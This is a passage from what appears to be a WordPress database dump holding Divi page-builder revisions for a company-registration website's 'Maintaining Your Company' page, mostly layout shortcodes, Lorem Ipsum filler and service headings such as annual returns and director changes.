custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Food &amp; Drink</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>ECommerce</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Gaming </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Event </h3>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_5,1_5,1_5,1_5,1_5\" _builder_version=\"3.25\" custom_padding=\"0|0px|27px|0px|false|false\"][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Sports &amp; Fitness </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Real Estate </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>productivity </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Hospitality </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Education </h3>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_style=\"wave\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.23\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"1%\" always_center_on_mobile=\"off\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>A Proven Process Time &amp; Time Again</h2>\n<p>Vivamus suscipit tortor eget felis porttitor volutpat. Vivamus suscipit tortor eget felis porttitor volutpat. Curabitur non nulla sit amet nisl tempus convallis quis ac lectus. Praesent sapien</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Maintaining Your Company','','inherit','closed','closed','','32724-revision-v1','','','2019-08-15 15:25:51','2019-08-15 13:25:51','',32724,'https://companyregistration.online/32724-revision-v1/',0,'revision','',0),(32727,3,'2019-08-14 11:07:36','2019-08-14 09:07:36','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"3.22\" custom_width_px__hover=\"1080px\" custom_width_px__hover_enabled=\"1080px\" custom_width_percent__hover=\"80%\" custom_width_percent__hover_enabled=\"80%\" locked=\"off\" parallax_1__hover=\"off\" parallax_1__hover_enabled=\"off\" parallax_2__hover=\"off\" parallax_2__hover_enabled=\"off\" parallax_3__hover=\"off\" parallax_3__hover_enabled=\"off\" parallax_method_1__hover=\"on\" parallax_method_1__hover_enabled=\"on\" parallax_method_2__hover=\"on\" parallax_method_2__hover_enabled=\"on\" parallax_method_3__hover=\"on\" parallax_method_3__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" inner_shadow__hover=\"off\" inner_shadow__hover_enabled=\"off\" make_fullwidth__hover=\"off\" make_fullwidth__hover_enabled=\"off\" use_custom_width__hover=\"off\" use_custom_width__hover_enabled=\"off\" width_unit__hover=\"on\" width_unit__hover_enabled=\"on\" make_equal__hover=\"off\" make_equal__hover_enabled=\"off\" use_custom_gutter__hover=\"off\" use_custom_gutter__hover_enabled=\"off\" gutter_width__hover=\"3\" gutter_width__hover_enabled=\"3\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\" max_width__hover=\"100%\" max_width__hover_enabled=\"100%\" filter_hue_rotate__hover=\"0deg\" filter_hue_rotate__hover_enabled=\"0deg\" filter_saturate__hover=\"100%\" filter_saturate__hover_enabled=\"100%\" filter_brightness__hover=\"100%\" filter_brightness__hover_enabled=\"100%\" filter_contrast__hover=\"100%\" filter_contrast__hover_enabled=\"100%\" filter_invert__hover=\"0%\" filter_invert__hover_enabled=\"0%\" filter_sepia__hover=\"0%\" filter_sepia__hover_enabled=\"0%\" filter_opacity__hover=\"100%\" filter_opacity__hover_enabled=\"100%\" filter_blur__hover=\"0px\" filter_blur__hover_enabled=\"0px\" mix_blend_mode__hover=\"normal\" mix_blend_mode__hover_enabled=\"normal\" animation_style__hover=\"none\" animation_style__hover_enabled=\"none\" animation_repeat__hover=\"once\" animation_repeat__hover_enabled=\"once\" animation_direction__hover=\"center\" animation_direction__hover_enabled=\"center\" animation_duration__hover=\"1000ms\" animation_duration__hover_enabled=\"1000ms\" animation_delay__hover=\"0ms\" animation_delay__hover_enabled=\"0ms\" animation_intensity_slide__hover=\"50%\" animation_intensity_slide__hover_enabled=\"50%\" animation_intensity_zoom__hover=\"50%\" animation_intensity_zoom__hover_enabled=\"50%\" animation_intensity_flip__hover=\"50%\" animation_intensity_flip__hover_enabled=\"50%\" animation_intensity_fold__hover=\"50%\" animation_intensity_fold__hover_enabled=\"50%\" animation_intensity_roll__hover=\"50%\" animation_intensity_roll__hover_enabled=\"50%\" animation_starting_opacity__hover=\"0%\" animation_starting_opacity__hover_enabled=\"0%\" animation_speed_curve__hover=\"ease-in-out\" animation_speed_curve__hover_enabled=\"ease-in-out\" hover_transition_duration__hover=\"300ms\" hover_transition_duration__hover_enabled=\"300ms\" hover_transition_delay__hover=\"0ms\" hover_transition_delay__hover_enabled=\"0ms\" hover_transition_speed_curve__hover=\"ease\" hover_transition_speed_curve__hover_enabled=\"ease\"][et_pb_row _builder_version=\"3.25\" locked=\"off\"][et_pb_column type=\"4_4\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_divider color=\"#1ca5ff\" divider_weight=\"16px\" _builder_version=\"3.19.6\" max_width=\"48px\" locked=\"off\"][/et_pb_divider][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"50px\" header_line_height=\"1.3em\" header_font_size_tablet=\"30px\" header_font_size_phone=\"24px\" header_font_size_last_edited=\"on|desktop\"]<h1>Maintaining Your Company</h1>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"18px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"16px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" locked=\"off\"]<p>Pellentesque in ipsum id orci porta dapibus. Vestibulum ac diam sit amet quam vehicula elementum sed sit amet dui. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-23.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" specialty=\"on\" padding_top_1=\"200px\" padding_top_3=\"100px\" padding_1_tablet=\"0px||\" padding_3_tablet=\"0px||\" padding_1_last_edited=\"on|tablet\" padding_3_last_edited=\"on|desktop\" admin_label=\"About\" _builder_version=\"3.22\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|tablet\" padding_top__hover=\"200px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px|||||\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>Why The Divi Framework?</h2>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"14px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"off|tablet\" locked=\"off\"]<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula. Curabitur arcu erat, accumsan id imperdiet et, porttitor at sem. Nulla quis lorem ut libero malesuada feugiat. Cras ultricies ligula sed magna dictum porta. Proin eget tortor risus. </p>\n<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula. Curabitur arcu erat, accumsan id imperdiet et, porttitor at sem. Nulla quis lorem ut libero malesuada feugiat. Cras ultricies ligula sed magna dictu</p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Annual Returns\" use_icon=\"on\" font_icon=\"%%176%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"][/et_pb_blurb][et_pb_blurb title=\"Change In CC Members\" use_icon=\"on\" font_icon=\"%%176%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"][/et_pb_blurb][et_pb_blurb title=\"Change In Company  Address\" use_icon=\"on\" font_icon=\"%%176%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"][/et_pb_blurb][et_pb_blurb title=\"Company Register\" use_icon=\"on\" font_icon=\"%%176%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|desktop\" padding_top__hover=\"100px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Change In Directors\" use_icon=\"on\" font_icon=\"%%176%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"][/et_pb_blurb][et_pb_blurb title=\"Change In CC Address\" use_icon=\"on\" font_icon=\"%%176%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"][/et_pb_blurb][et_pb_blurb title=\"Company and Closed Corporation Restoration\" use_icon=\"on\" font_icon=\"%%176%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"][/et_pb_blurb][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22\"][et_pb_row _builder_version=\"3.25\" column_structure=\"1_3,1_3,1_3\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Change In Directors\" image=\"https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Director-cover-final.png\" content_max_width=\"400px\" content_max_width_tablet=\"550px\" content_max_width_last_edited=\"off|desktop\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_line_height=\"2em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"]<p>Praesent sapien massa, convallis a pellentesque nec, egestas non nisi. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Change In Adress\" image=\"https://companyregistration.online/wp-content/uploads/2016/03/Change-in-Address-cover.png\" content_max_width=\"400px\" content_max_width_tablet=\"550px\" content_max_width_last_edited=\"off|desktop\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_line_height=\"2em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"]<p>Praesent sapien massa, convallis a pellentesque nec, egestas non nisi. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Company & Closed Corporation Restoration\" image=\"https://companyregistration.online/wp-content/uploads/2016/04/Restoration-of-Company-1.png\" content_max_width=\"400px\" content_max_width_tablet=\"550px\" content_max_width_last_edited=\"off|desktop\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"12px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" body_font=\"||||||||\" body_line_height=\"2em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" locked=\"off\"]<p>Praesent sapien massa, convallis a pellentesque nec, egestas non nisi. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia</p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Process\" _builder_version=\"3.22\" locked=\"off\"][et_pb_row _builder_version=\"3.25\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>We Build For the All of the Biggest Product Categories</h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" custom_padding=\"0|0px|27px|0px|false|false\" column_structure=\"1_5,1_5,1_5,1_5,1_5\"][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Healthcare</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Food &amp; Drink</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>ECommerce</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Gaming </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Event </h3>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" custom_padding=\"0|0px|27px|0px|false|false\" column_structure=\"1_5,1_5,1_5,1_5,1_5\"][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" 